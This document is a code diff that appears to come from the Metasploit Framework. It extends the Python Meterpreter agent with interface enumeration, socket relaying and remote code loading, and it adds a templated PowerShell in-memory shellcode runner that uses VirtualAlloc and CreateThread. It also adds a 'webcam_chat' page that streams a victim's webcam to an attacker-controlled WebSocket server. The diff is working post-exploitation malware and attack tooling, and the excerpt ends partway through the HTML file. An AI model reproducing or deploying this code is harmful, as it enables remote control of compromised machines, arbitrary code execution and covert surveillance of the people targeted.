+			elif attribute.type == IFLA_IFNAME:
+				iface_info['name'] = attr_data
+			elif attribute.type == IFLA_MTU:
+				iface_info['mtu'] = struct.unpack('<I', attr_data)[0]
+		interfaces[iface.index] = iface_info
+
+	responses = netlink_request(RTM_GETADDR)
+	for res_data in responses:
+		iface = cstruct_unpack(IFADDRMSG, res_data)
+		if not iface.family in (socket.AF_INET, socket.AF_INET6):
+			continue
+		iface_info = interfaces.get(iface.index, {})
+		cursor = ctypes.sizeof(IFADDRMSG)
+		while cursor < len(res_data):
+			attribute = cstruct_unpack(RTATTR, res_data[cursor:])
+			at_len = attribute.len
+			attr_data = res_data[cursor + ctypes.sizeof(RTATTR):(cursor + at_len)]
+			cursor += rta_align(at_len)
+
+			if attribute.type == IFA_ADDRESS:
+				nm_bits = iface.prefixlen
+				if iface.family == socket.AF_INET:
+					netmask = struct.pack('!I', calculate_32bit_netmask(nm_bits))
+				else:
+					if nm_bits >= 96:
+						netmask = struct.pack('!iiiI', -1, -1, -1, calculate_32bit_netmask(nm_bits))
+					elif nm_bits >= 64:
+						netmask = struct.pack('!iiII', -1, -1, calculate_32bit_netmask(nm_bits), 0)
+					elif nm_bits >= 32:
+						netmask = struct.pack('!iIII', -1, calculate_32bit_netmask(nm_bits), 0, 0)
+					else:
+						netmask = struct.pack('!IIII', calculate_32bit_netmask(nm_bits), 0, 0, 0)
+				addr_list = iface_info.get('addrs', [])
+				addr_list.append((iface.family, attr_data, netmask))
+				iface_info['addrs'] = addr_list
+			elif attribute.type == IFA_LABEL:
+				iface_info['name'] = attr_data
+		interfaces[iface.index] = iface_info
+	return interfaces.values()
+
+def stdapi_net_config_get_interfaces_via_osxsc():
+	ds = osxsc.SCDynamicStoreCreate(None, 'GetInterfaceInformation', None, None)
+	entities = []
+	entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv4))
+	entities.append(osxsc.SCDynamicStoreKeyCreateNetworkInterfaceEntity(None, osxsc.kSCDynamicStoreDomainState, osxsc.kSCCompAnyRegex, osxsc.kSCEntNetIPv6))
+	patterns = osxsc.CFArrayCreate(None, entities, len(entities), osxsc.kCFTypeArrayCallBacks)
+	values = osxsc.SCDynamicStoreCopyMultiple(ds, None, patterns)
+	interfaces = {}
+	for key, value in values.items():
+		iface_name = key.split('/')[3]
+		iface_info = interfaces.get(iface_name, {})
+		iface_info['name'] = str(iface_name)
+		if key.endswith('IPv4'):
+			family = socket.AF_INET
+		elif key.endswith('IPv6'):
+			family = socket.AF_INET6
+		else:
+			continue
+		iface_addresses = iface_info.get('addrs', [])
+		for idx in range(len(value['Addresses'])):
+			if family == socket.AF_INET:
+				iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), inet_pton(family, value['SubnetMasks'][idx])))
+			else:
+				iface_addresses.append((family, inet_pton(family, value['Addresses'][idx]), value['PrefixLength'][idx]))
+		iface_info['addrs'] = iface_addresses
+		interfaces[iface_name] = iface_info
+	for iface_ref in osxsc.SCNetworkInterfaceCopyAll():
+		iface_name = osxsc.SCNetworkInterfaceGetBSDName(iface_ref)
+		if not iface_name in interfaces:
+			iface_type = osxsc.SCNetworkInterfaceGetInterfaceType(iface_ref)
+			if not iface_type in ['Ethernet', 'IEEE80211']:
+				continue
+			interfaces[iface_name] = {'name': str(iface_name)}
+		iface_info = interfaces[iface_name]
+		mtu = osxsc.SCNetworkInterfaceCopyMTU(iface_ref, None, None, None)[1]
+		iface_info['mtu'] = mtu
+		hw_addr = osxsc.SCNetworkInterfaceGetHardwareAddressString(iface_ref)
+		if hw_addr:
+			hw_addr = hw_addr.replace(':', '')
+			hw_addr = hw_addr.decode('hex')
+			iface_info['hw_addr'] = hw_addr
+	ifnames = interfaces.keys()
+	ifnames.sort()
+	for iface_name, iface_info in interfaces.items():
+		iface_info['index'] = ifnames.index(iface_name)
+	return interfaces.values()
+
+def stdapi_net_config_get_interfaces_via_windll():
+	iphlpapi = ctypes.windll.iphlpapi
+	if not hasattr(iphlpapi, 'GetAdaptersAddresses'):
+		return stdapi_net_config_get_interfaces_via_windll_mib()
+	Flags = (GAA_FLAG_INCLUDE_PREFIX | GAA_FLAG_SKIP_DNS_SERVER | GAA_FLAG_SKIP_MULTICAST | GAA_FLAG_SKIP_ANYCAST)
+	AdapterAddresses = ctypes.c_void_p()
+	SizePointer = ctypes.c_ulong()
+	SizePointer.value = 0
+	iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, AdapterAddresses, ctypes.byref(SizePointer))
+	AdapterAddressesData = (ctypes.c_uint8 * SizePointer.value)()
+	iphlpapi.GetAdaptersAddresses(socket.AF_UNSPEC, Flags, None, ctypes.byref(AdapterAddressesData), ctypes.byref(SizePointer))
+	AdapterAddresses = ctypes.string_at(ctypes.byref(AdapterAddressesData), SizePointer.value)
+	AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, AdapterAddresses)
+	if AdapterAddresses.u.s.Length <= 72:
+		return stdapi_net_config_get_interfaces_via_windll_mib()
+	win_version = windll_GetVersion()
+	interfaces = []
+	pAdapterAddresses = ctypes.byref(AdapterAddresses)
+	while pAdapterAddresses:
+		AdapterAddresses = cstruct_unpack(IP_ADAPTER_ADDRESSES, pAdapterAddresses)
+		pAdapterAddresses = AdapterAddresses.Next
+		pFirstPrefix = AdapterAddresses.FirstPrefix
+		iface_info = {}
+		iface_info['index'] = AdapterAddresses.u.s.IfIndex
+		if AdapterAddresses.PhysicalAddressLength:
+			iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
+		iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
+		iface_info['mtu'] = AdapterAddresses.Mtu
+		pUniAddr = AdapterAddresses.FirstUnicastAddress
+		while pUniAddr:
+			UniAddr = cstruct_unpack(IP_ADAPTER_UNICAST_ADDRESS, pUniAddr)
+			pUniAddr = UniAddr.Next
+			address = cstruct_unpack(SOCKADDR, UniAddr.Address.lpSockaddr)
+			if not address.sa_family in (socket.AF_INET, socket.AF_INET6):
+				continue
+			prefix = 0
+			if win_version.dwMajorVersion >= 6:
+				prefix = UniAddr.OnLinkPrefixLength
+			elif pFirstPrefix:
+				ip_adapter_prefix = 'QPPIL'
+				prefix_data = ctypes.string_at(pFirstPrefix, struct.calcsize(ip_adapter_prefix))
+				prefix = struct.unpack(ip_adapter_prefix, prefix_data)[4]
+			iface_addresses = iface_info.get('addrs', [])
+			if address.sa_family == socket.AF_INET:
+				iface_addresses.append((socket.AF_INET, ctypes.string_at(ctypes.byref(address.sa_data), 6)[2:], prefix))
+			else:
+				iface_addresses.append((socket.AF_INET6, ctypes.string_at(ctypes.byref(address.sa_data), 22)[6:], prefix))
+			iface_info['addrs'] = iface_addresses
+		interfaces.append(iface_info)
+	return interfaces
+
+def stdapi_net_config_get_interfaces_via_windll_mib():
+	iphlpapi = ctypes.windll.iphlpapi
+	table = (ctypes.c_uint8 * (ctypes.sizeof(MIB_IPADDRROW) * 33))()
+	pdwSize = ctypes.c_ulong()
+	pdwSize.value = ctypes.sizeof(table)
+	if (iphlpapi.GetIpAddrTable(ctypes.byref(table), ctypes.byref(pdwSize), True) != 0):
+		return None
+	interfaces = []
+	table_data = ctypes.string_at(table, pdwSize.value)
+	entries = struct.unpack('I', table_data[:4])[0]
+	table_data = table_data[4:]
+	for i in xrange(entries):
+		addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
+		ifrow = MIB_IFROW()
+		ifrow.dwIndex = addrrow.dwIndex
+		if iphlpapi.GetIfEntry(ctypes.byref(ifrow)) != 0:
+			continue
+		iface_info = {}
+		table_data = table_data[ctypes.sizeof(MIB_IPADDRROW):]
+		iface_info['index'] = addrrow.dwIndex
+		iface_info['addrs'] = [(socket.AF_INET, struct.pack('<I', addrrow.dwAddr), struct.pack('<I', addrrow.dwMask))]
+		if ifrow.dwPhysAddrLen:
+			iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(ifrow.bPhysAddr), ifrow.dwPhysAddrLen)
+		if ifrow.dwDescrLen:
+			iface_info['name'] = ifrow.bDescr
+		iface_info['mtu'] = ifrow.dwMtu
+		interfaces.append(iface_info)
+	return interfaces
+
@meterpreter.register_function
 def stdapi_net_resolve_host(request, response):
 	hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
@@ -776,9 +1228,10 @@ def stdapi_net_resolve_hosts(request, response):

@meterpreter.register_function
 def stdapi_net_socket_tcp_shutdown(request, response):
-	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
+	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
+	how = packet_get_tlv(request, TLV_TYPE_SHUTDOWN_HOW).get('value', socket.SHUT_RDWR)
 	channel = meterpreter.channels[channel_id]
-	channel.close()
+	channel.shutdown(how)
 	return ERROR_SUCCESS, response

@meterpreter.register_function_windll
@@ -1,6 +1,12 @@
 #!/usr/bin/python
 import code
-import ctypes
+try:
+	import ctypes
+except:
+	has_windll = False
+else:
+	has_windll = hasattr(ctypes, 'windll')
+
 import os
 import random
 import select
@@ -10,14 +16,12 @@ import subprocess
 import sys
 import threading

-has_windll = hasattr(ctypes, 'windll')
-
 #
 # Constants
 #
-PACKET_TYPE_REQUEST = 0
-PACKET_TYPE_RESPONSE = 1
-PACKET_TYPE_PLAIN_REQUEST = 10
+PACKET_TYPE_REQUEST        = 0
+PACKET_TYPE_RESPONSE       = 1
+PACKET_TYPE_PLAIN_REQUEST  = 10
 PACKET_TYPE_PLAIN_RESPONSE = 11

 ERROR_SUCCESS = 0
@@ -25,74 +29,103 @@ ERROR_SUCCESS = 0
 ERROR_FAILURE = 1

 CHANNEL_CLASS_BUFFERED = 0
-CHANNEL_CLASS_STREAM = 1
+CHANNEL_CLASS_STREAM   = 1
 CHANNEL_CLASS_DATAGRAM = 2
-CHANNEL_CLASS_POOL = 3
+CHANNEL_CLASS_POOL     = 3

 #
 # TLV Meta Types
 #
-TLV_META_TYPE_NONE =       (   0   )
-TLV_META_TYPE_STRING =     (1 << 16)
-TLV_META_TYPE_UINT =       (1 << 17)
-TLV_META_TYPE_RAW =        (1 << 18)
-TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_NONE       = (   0   )
+TLV_META_TYPE_STRING     = (1 << 16)
+TLV_META_TYPE_UINT       = (1 << 17)
+TLV_META_TYPE_RAW        = (1 << 18)
+TLV_META_TYPE_BOOL       = (1 << 19)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
-TLV_META_TYPE_GROUP =      (1 << 30)
-TLV_META_TYPE_COMPLEX =    (1 << 31)
+TLV_META_TYPE_GROUP      = (1 << 30)
+TLV_META_TYPE_COMPLEX    = (1 << 31)
 # not defined in original
-TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)

 #
 # TLV base starting points
 #
-TLV_RESERVED =   0
+TLV_RESERVED   = 0
 TLV_EXTENSIONS = 20000
-TLV_USER =       40000
-TLV_TEMP =       60000
+TLV_USER       = 40000
+TLV_TEMP       = 60000

 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
-TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
-TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
-TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
-TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
+TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
+TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
+TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4

-TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
-TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
-TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+TLV_TYPE_STRING                = TLV_META_TYPE_STRING  | 10
+TLV_TYPE_UINT                  = TLV_META_TYPE_UINT    | 11
+TLV_TYPE_BOOL                  = TLV_META_TYPE_BOOL    | 12

-TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
-TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
-TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+TLV_TYPE_LENGTH                = TLV_META_TYPE_UINT    | 25
+TLV_TYPE_DATA                  = TLV_META_TYPE_RAW     | 26
+TLV_TYPE_FLAGS                 = TLV_META_TYPE_UINT    | 27

-TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
-TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
-TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
-TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
-TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+TLV_TYPE_CHANNEL_ID            = TLV_META_TYPE_UINT    | 50
+TLV_TYPE_CHANNEL_TYPE          = TLV_META_TYPE_STRING  | 51
+TLV_TYPE_CHANNEL_DATA          = TLV_META_TYPE_RAW     | 52
+TLV_TYPE_CHANNEL_DATA_GROUP    = TLV_META_TYPE_GROUP   | 53
+TLV_TYPE_CHANNEL_CLASS         = TLV_META_TYPE_UINT    | 54
+TLV_TYPE_CHANNEL_PARENTID      = TLV_META_TYPE_UINT    | 55

-TLV_TYPE_SEEK_WHENCE =         TLV_META_TYPE_UINT   |  70
-TLV_TYPE_SEEK_OFFSET =         TLV_META_TYPE_UINT   |  71
-TLV_TYPE_SEEK_POS =            TLV_META_TYPE_UINT   |  72
+TLV_TYPE_SEEK_WHENCE           = TLV_META_TYPE_UINT    | 70
+TLV_TYPE_SEEK_OFFSET           = TLV_META_TYPE_UINT    | 71
+TLV_TYPE_SEEK_POS              = TLV_META_TYPE_UINT    | 72

-TLV_TYPE_EXCEPTION_CODE =      TLV_META_TYPE_UINT   | 300
-TLV_TYPE_EXCEPTION_STRING =    TLV_META_TYPE_STRING | 301
+TLV_TYPE_EXCEPTION_CODE        = TLV_META_TYPE_UINT    | 300
+TLV_TYPE_EXCEPTION_STRING      = TLV_META_TYPE_STRING  | 301

-TLV_TYPE_LIBRARY_PATH =        TLV_META_TYPE_STRING | 400
-TLV_TYPE_TARGET_PATH =         TLV_META_TYPE_STRING | 401
-TLV_TYPE_MIGRATE_PID =         TLV_META_TYPE_UINT   | 402
-TLV_TYPE_MIGRATE_LEN =         TLV_META_TYPE_UINT   | 403
+TLV_TYPE_LIBRARY_PATH          = TLV_META_TYPE_STRING  | 400
+TLV_TYPE_TARGET_PATH           = TLV_META_TYPE_STRING  | 401
+TLV_TYPE_MIGRATE_PID           = TLV_META_TYPE_UINT    | 402
+TLV_TYPE_MIGRATE_LEN           = TLV_META_TYPE_UINT    | 403

-TLV_TYPE_CIPHER_NAME =         TLV_META_TYPE_STRING | 500
-TLV_TYPE_CIPHER_PARAMETERS =   TLV_META_TYPE_GROUP  | 501
+TLV_TYPE_CIPHER_NAME           = TLV_META_TYPE_STRING  | 500
+TLV_TYPE_CIPHER_PARAMETERS     = TLV_META_TYPE_GROUP   | 501
+
+TLV_TYPE_PEER_HOST             = TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT             = TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
+
+EXPORTED_SYMBOLS = {}
+
+def export(symbol):
+	EXPORTED_SYMBOLS[symbol.__name__] = symbol
+	return symbol

 def generate_request_id():
 	chars = 'abcdefghijklmnopqrstuvwxyz'
 	return ''.join(random.choice(chars) for x in xrange(32))

+@export
+def inet_pton(family, address):
+	if hasattr(socket, 'inet_pton'):
+		return socket.inet_pton(family, address)
+	elif has_windll:
+		WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
+		lpAddress = (ctypes.c_ubyte * 28)()
+		lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
+		if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
+			raise Exception('WSAStringToAddress failed')
+		if family == socket.AF_INET:
+			return ''.join(map(chr, lpAddress[4:8]))
+		elif family == socket.AF_INET6:
+			return ''.join(map(chr, lpAddress[8:24]))
+	raise Exception('no suitable inet_pton functionality is available')
+
+@export
 def packet_get_tlv(pkt, tlv_type):
 	offset = 0
 	while (offset < len(pkt)):
@@ -111,6 +144,7 @@ def packet_get_tlv(pkt, tlv_type):
 		offset += tlv[0]
 	return {}

+@export
 def packet_enum_tlvs(pkt, tlv_type = None):
 	offset = 0
 	while (offset < len(pkt)):
@@ -129,6 +163,7 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 		offset += tlv[0]
 	raise StopIteration()

+@export
 def tlv_pack(*args):
 	if len(args) == 2:
 		tlv = {'type':args[0], 'value':args[1]}
@@ -149,6 +184,25 @@ def tlv_pack(*args):
 		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
 	return data

+#@export
+class MeterpreterSocket(object):
+	def __init__(self, sock):
+		self.sock = sock
+
+	def __getattr__(self, name):
+		return getattr(self.sock, name)
+export(MeterpreterSocket)
+
+#@export
+class MeterpreterSocketClient(MeterpreterSocket):
+	pass
+export(MeterpreterSocketClient)
+
+#@export
+class MeterpreterSocketServer(MeterpreterSocket):
+	pass
+export(MeterpreterSocketServer)
+
 class STDProcessBuffer(threading.Thread):
 	def __init__(self, std, is_alive):
 		threading.Thread.__init__(self)
@@ -158,15 +212,10 @@ class STDProcessBuffer(threading.Thread):
 		self.data_lock = threading.RLock()

 	def run(self):
-		while self.is_alive():
-			byte = self.std.read(1)
+		for byte in iter(lambda: self.std.read(1), ''):
 			self.data_lock.acquire()
 			self.data += byte
 			self.data_lock.release()
-		data = self.std.read()
-		self.data_lock.acquire()
-		self.data += data
-		self.data_lock.release()

 	def is_read_ready(self):
 		return len(self.data) != 0
@@ -183,6 +232,7 @@ class STDProcessBuffer(threading.Thread):
 		self.data_lock.release()
 		return data

+#@export
 class STDProcess(subprocess.Popen):
 	def __init__(self, *args, **kwargs):
 		subprocess.Popen.__init__(self, *args, **kwargs)
@@ -192,6 +242,7 @@ class STDProcess(subprocess.Popen):
 		self.stdout_reader.start()
 		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
 		self.stderr_reader.start()
+export(STDProcess)

 class PythonMeterpreter(object):
 	def __init__(self, socket):
@@ -206,10 +257,12 @@ class PythonMeterpreter(object):

 	def register_function(self, func):
 		self.extension_functions[func.__name__] = func
+		return func

 	def register_function_windll(self, func):
 		if has_windll:
 			self.register_function(func)
+		return func

 	def add_channel(self, channel):
 		idx = 0
@@ -240,7 +293,8 @@ class PythonMeterpreter(object):
 				self.socket.send(response)
 			else:
 				channels_for_removal = []
-				channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
+				# iterate over the keys because self.channels could be modified if one is closed
+				channel_ids = self.channels.keys()
 				for channel_id in channel_ids:
 					channel = self.channels[channel_id]
 					data = ''
@@ -253,7 +307,7 @@ class PythonMeterpreter(object):
 							data = channel.stderr_reader.read()
 						elif channel.poll() != None:
 							self.handle_dead_resource_channel(channel_id)
-					elif isinstance(channel, socket._socketobject):
+					elif isinstance(channel, MeterpreterSocketClient):
 						while len(select.select([channel.fileno()], [], [], 0)[0]):
 							try:
 								d = channel.recv(1)
@@ -263,6 +317,21 @@ class PythonMeterpreter(object):
 								self.handle_dead_resource_channel(channel_id)
 								break
 							data += d
+					elif isinstance(channel, MeterpreterSocketServer):
+						if len(select.select([channel.fileno()], [], [], 0)[0]):
+							(client_sock, client_addr) = channel.accept()
+							server_addr = channel.getsockname()
+							client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
+							pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
+							pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
+							pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
+							pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
+							pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
+							pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
+							pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
+							pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
+							pkt  = struct.pack('>I', len(pkt) + 4) + pkt
+							self.socket.send(pkt)
 					if data:
 						pkt  = struct.pack('>I', PACKET_TYPE_REQUEST)
 						pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
@@ -289,7 +358,9 @@ class PythonMeterpreter(object):
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 			return ERROR_FAILURE
 		preloadlib_methods = self.extension_functions.keys()
-		i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
+		symbols_for_extensions = {'meterpreter':self}
+		symbols_for_extensions.update(EXPORTED_SYMBOLS)
+		i = code.InteractiveInterpreter(symbols_for_extensions)
 		i.runcode(compile(data_tlv['value'], '', 'exec'))
 		postloadlib_methods = self.extension_functions.keys()
 		new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
@@ -304,7 +375,7 @@ class PythonMeterpreter(object):

 	def _core_channel_open(self, request, response):
 		channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
-		handler = 'channel_create_' + channel_type['value']
+		handler = 'channel_open_' + channel_type['value']
 		if handler not in self.extension_functions:
 			return ERROR_FAILURE, response
 		handler = self.extension_functions[handler]
@@ -319,7 +390,7 @@ class PythonMeterpreter(object):
 			channel.close()
 		elif isinstance(channel, subprocess.Popen):
 			channel.kill()
-		elif isinstance(s, socket._socketobject):
+		elif isinstance(channel, MeterpreterSocket):
 			channel.close()
 		else:
 			return ERROR_FAILURE, response
@@ -335,7 +406,7 @@ class PythonMeterpreter(object):
 		channel = self.channels[channel_id]
 		result = False
 		if isinstance(channel, file):
-			result = channel.tell() == os.fstat(channel.fileno()).st_size
+			result = channel.tell() >= os.fstat(channel.fileno()).st_size
 		response += tlv_pack(TLV_TYPE_BOOL, result)
 		return ERROR_SUCCESS, response

@@ -368,7 +439,7 @@ class PythonMeterpreter(object):
 				self.handle_dead_resource_channel(channel_id)
 			if channel.stdout_reader.is_read_ready():
 				data = channel.stdout_reader.read(length)
-		elif isinstance(s, socket._socketobject):
+		elif isinstance(channel, MeterpreterSocket):
 			data = channel.recv(length)
 		else:
 			return ERROR_FAILURE, response
@@ -390,7 +461,7 @@ class PythonMeterpreter(object):
 				self.handle_dead_resource_channel(channel_id)
 				return ERROR_FAILURE, response
 			channel.stdin.write(channel_data)
-		elif isinstance(s, socket._socketobject):
+		elif isinstance(channel, MeterpreterSocket):
 			try:
 				l = channel.send(channel_data)
 			except socket.error:
@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+	
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+	
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+		
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
@@ -0,0 +1,193 @@
+<html>
+<head>
+<title>webcam_chat</title>
+<style type="text/css">
+	div.container {
+		position: relative;
+	}
+
+	div.windowa {
+		height: 480px;
+		width: 640px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: black;
+		position: absolute;
+		left: 50;
+		padding : 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+		color: white;
+	}
+
+	div.windowb {
+		height: 180px;
+		width: 200px;
+		border-radius: 15px;
+		-moz-border-raidus: 15px;
+		background-color: #9B9B9B;
+		position: absolute;
+		top: 480;
+		left: 470;
+		padding: 10px;
+		margin-left: auto;
+		margin-right: auto;
+		text-align: center;
+		vertical-align: middle;
+	}
+
+	div.windowc {
+		position: absolute;
+		top: 510;
+		left: 80;
+		height: 150px;
+		width: 380px;
+		color: red;
+	}
+
+	div.footer {
+		position: fixed;
+		bottom: 0;
+		width: 100%;
+		padding: 10px;
+	}
+
+	video.peer {
+		position: absolute;
+		top: 15;
+		left: 10;
+	}
+
+	video.self {
+		position: absolute;
+		top: 5;
+		left: 10;
+	}
+</style>
+<script src="=WEBRTCAPIJS="> </script>
+<script>
+	window.onerror = function(e) {
+		document.getElementById("message").innerHTML = "Error: " + e.toString();
+	}
+
+	window.onload = function() {
+		document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session."
+	}
+
+	var channel = '=CHANNEL=';
+	var websocket = new WebSocket('ws://=SERVER=');
+	var inSession = false;
+
+	websocket.onopen = function() {
+		websocket.push(JSON.stringify({
+			open: true,
+			channel: channel
+		}));
+	};
+
+	websocket.push = websocket.send;
+	websocket.send = function(data) {
+		websocket.push(JSON.stringify({
+			data: data,
+			channel: channel
+		}));
+	};
+
+	var peer = new PeerConnection(websocket);
+	peer.onUserFound = function(userid) {
+		if (inSession) {
+			console.debug("Already in session, will not send another participation request");
+			return;
+		};
+
+		userid = "=OFFERERID=";
+
+		getUserMedia(function(stream) {
+			peer.addStream(stream);
+			peer.sendParticipationRequest(userid);
+			inSession = true;
+			document.getElementById("message").innerHTML = "Session is now active.";
+		});
+	};
+
+	peer.onStreamAdded = function(e) {
+		var video = e.mediaElement;
+		if (e.userid == 'self') {
+			video.controls = true;
+			video.setAttribute('width', 200);
+			video.setAttribute('height', 190);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'self');
+			document.getElementById("windowb").appendChild(video);
+		}
+		else {
+			video.controls = true;
+			video.setAttribute('width', 640);
+			video.setAttribute('height', 460);
+			video.setAttribute('controls', false);
+			video.setAttribute('class', 'peer');
+			document.getElementById("windowa").appendChild(video);
+		}
+		video.muted = false;
+		video.volume = 0.5;
+		video.play();
+	};
+
+	peer.onStreamEnded = function(e) {
+		var video = e.mediaElement;
+		if (video) {
+			video.style.opacity = 0;
+			setTimeout(function() {
+				video.parentNode.removeChild(video);
+			}, 1000);
+		}
+		document.getElementById("message").innerHTML = "The video session has ended.";
+	};
+					
+	function getUserMedia(callback) {
+
+		var hints = {audio:true,video:{
+			optional: [],
+			mandatory: {
+				minWidth: 1280,
+				minHeight: 720,
+				maxWidth: 1920,
+				maxHeight: 1080,
+				minAspectRatio: 1.77
+			}
+		}};
+
